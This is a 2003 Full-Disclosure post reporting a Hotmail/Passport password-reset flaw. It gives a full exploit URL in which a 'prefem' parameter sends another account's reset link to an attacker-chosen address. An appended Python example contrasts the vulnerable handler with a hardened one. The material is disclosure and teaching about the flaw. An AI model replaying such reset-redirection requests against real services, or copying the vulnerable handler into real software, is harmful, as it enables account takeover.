
[Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability



<html><div style='background-color:'><DIV>
<DIV>
<DIV class=RTE><EM><FONT face=Arial color=#ffffff size=2><FONT color=#000000>Hotmail &amp; Passport (.NET Accounts) Vulnerability<BR><BR>
There is a very serious and stupid vulnerability or bad coding in Hotmail / Passport's (.NET Accounts)<BR><BR>
I tried sending emails several times to Hotmail / Passport contact addresses, but was always met with the NLP bots.<BR><BR>
I guess I don't need to go into details of how crucial and important Hotmail / Passport's .NET Account passport is to anyone.<BR><BR>
You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and what not.<BR><BR>
It is so simple that it is funny.<BR><BR>
All you got to do is hit the following in your browser:<BR><BR>
<A href="https://register.passport.net/emailpwdreset.srf?lc=1033&amp;em=modulohio@xxxxxxxxxxx&amp;id=&amp;cb=&amp;prefem=li_crvgjur1@xxxxxxxxxxx&amp;rst=1">https://register.passport.net/emailpwdreset.srf?lc=1033&amp;em=modulohio@xxxxxxxxxxx&amp;id=&amp;cb=&amp;prefem=li_crvgjur1@xxxxxxxxxxx&amp;rst=1</A><BR><BR>
And you'll get an email on attacker@xxxxxxxxxxxx asking you to click on a url something like this:<BR><BR>
http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&amp;URLNum=0&amp;lc=1033<BR><BR>
From that url, you can reset the password and I don't think I need to say anything more about it.<BR><BR>
Vulnerability / Flaw discovered : 12th April 2003<BR>
Vendor / Owner notified : Yes (as far as emailing them more than 10 times is concerned)<BR><BR><BR>
Regards<BR>--------<BR>Muhammad Faisal Rauf Danka</FONT></FONT></EM></DIV></DIV></DIV></div></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
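
The flaw class reported above, a reset link mailed to an address taken from the request, shown beside a corrected handler. This is an added example, not part of the original post and not Microsoft's code. It assumes, as the post implies, that `em` names the account and `prefem` the address the mail is sent to; the function names, the in-memory stores, the `idp.example` link and all addresses are constructed for illustration.

```python
import hashlib
import secrets
import time

# Constructed sample data: account -> recovery address stored at sign-up.
ACCOUNTS = {"victim@mail.example": "victim-alt@other.example"}
TOKENS = {}   # sha256(token) -> (account, expiry timestamp)
OUTBOX = []   # (recipient, reset link) pairs; stand-in for a mail queue
TOKEN_TTL = 15 * 60
LINK = "https://idp.example/reset?t="   # hypothetical reset endpoint
REPLY = "If the account exists, a reset mail has been sent."


def _issue_token(account):
    """Create a single-use reset token and store only its hash."""
    token = secrets.token_urlsafe(32)
    digest = hashlib.sha256(token.encode()).hexdigest()
    TOKENS[digest] = (account, time.time() + TOKEN_TTL)
    return token


def reset_vulnerable(params):
    """Flawed pattern: the recipient comes from the request ('prefem')."""
    account, recipient = params.get("em"), params.get("prefem")
    if account in ACCOUNTS and recipient:
        OUTBOX.append((recipient, LINK + _issue_token(account)))
    return REPLY


def reset_hardened(params):
    """Recipient is read from the account record; 'prefem' is ignored."""
    account = params.get("em")
    recipient = ACCOUNTS.get(account)   # server-side source of truth
    if recipient:
        OUTBOX.append((recipient, LINK + _issue_token(account)))
    return REPLY                        # same reply whether or not it exists


def redeem(token):
    """Return the account for a valid, unexpired token and consume it."""
    digest = hashlib.sha256(token.encode()).hexdigest()
    account, expiry = TOKENS.pop(digest, (None, 0))
    return account if time.time() < expiry else None
```

The hardened handler never reads a destination address from the request, so a changed `prefem` value has no effect on where the link goes.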